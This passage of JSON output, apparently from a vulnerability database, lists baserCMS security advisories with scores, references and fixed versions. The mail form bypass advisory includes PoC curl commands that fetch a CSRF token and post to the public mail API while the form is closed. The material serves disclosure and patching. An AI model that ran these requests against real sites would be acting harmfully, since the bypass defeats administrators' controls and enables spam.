CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>\n- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>\n- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>\n\nThis advisory was translated from Japanese to English using GitHub Copilot.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00145", "scoring_system": "epss", "scoring_elements": "0.34571", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940" }, { "reference_url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq", "reference_id": "GHSA-c5c6-37vq-pjcq", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30940", "GHSA-c5c6-37vq-pjcq" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=api", "vulnerability_id": "VCID-8ssu-umet-37bk", "summary": "baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n Malicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01615", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32734" }, { "reference_url": "https://github.com/advisories/GHSA-677c-xv24-crgx", "reference_id": "GHSA-677c-xv24-crgx", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-677c-xv24-crgx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-32734", "GHSA-677c-xv24-crgx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/109472?format=api", "vulnerability_id": "VCID-ays7-6wvh-augt", "summary": "baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-42486", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.3445", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00144", "scoring_system": "epss", "scoring_elements": "0.34547", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-42486" }, { "reference_url": "https://basercms.net/security/JVN_53682526", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/" } ], "url": "https://basercms.net/security/JVN_53682526" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://jvn.jp/en/jp/JVN53682526/index.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/" } ], "url": "https://jvn.jp/en/jp/JVN53682526/index.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42486", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42486" }, { "reference_url": "https://github.com/advisories/GHSA-7w2v-35j3-xrm9", "reference_id": "GHSA-7w2v-35j3-xrm9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7w2v-35j3-xrm9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api", "purl": "pkg:composer/baserproject/basercms@4.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" }, { "vulnerability": "VCID-zxns-tzw3-27fr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2" } ], "aliases": [ "CVE-2022-42486", "GHSA-7w2v-35j3-xrm9" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=api", "vulnerability_id": "VCID-d1sf-cmct-zbh1", "summary": "baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()` \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05615", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30878" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30878" }, { "reference_url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c", "reference_id": "GHSA-8cr7-r8qw-gp3c", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8cr7-r8qw-gp3c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30878", "GHSA-8cr7-r8qw-gp3c" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46297?format=api", "vulnerability_id": "VCID-g56w-z9cx-5ygv", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-29009", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68361", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-29009" }, { "reference_url": "https://basercms.net/security/JVN_45547161", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/" } ], "url": "https://basercms.net/security/JVN_45547161" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29009", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29009" }, { "reference_url": "https://github.com/advisories/GHSA-8vqx-prq4-rqrq", "reference_id": "GHSA-8vqx-prq4-rqrq", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-8vqx-prq4-rqrq" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq", "reference_id": "GHSA-8vqx-prq4-rqrq", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api", "purl": "pkg:composer/baserproject/basercms@4.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/685977?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.0-beta1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1" } ], "aliases": [ "CVE-2023-29009", "GHSA-8vqx-prq4-rqrq" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47107?format=api", "vulnerability_id": "VCID-ggv8-3v9t-mfea", "summary": "baserCMS Cross-site Scripting vulnerability in Site search Feature\nThere is a XSS Vulnerability in Site search Feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-44379", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00622", "scoring_system": "epss", "scoring_elements": "0.70549", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-44379" }, { "reference_url": "https://basercms.net/security/JVN_73283159", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/" } ], "url": "https://basercms.net/security/JVN_73283159" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/" } ], "url": "https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44379", "reference_id": "CVE-2023-44379", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44379" }, { "reference_url": "https://github.com/advisories/GHSA-66c2-p8rh-qx87", "reference_id": "GHSA-66c2-p8rh-qx87", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-66c2-p8rh-qx87" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87", "reference_id": "GHSA-66c2-p8rh-qx87", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": 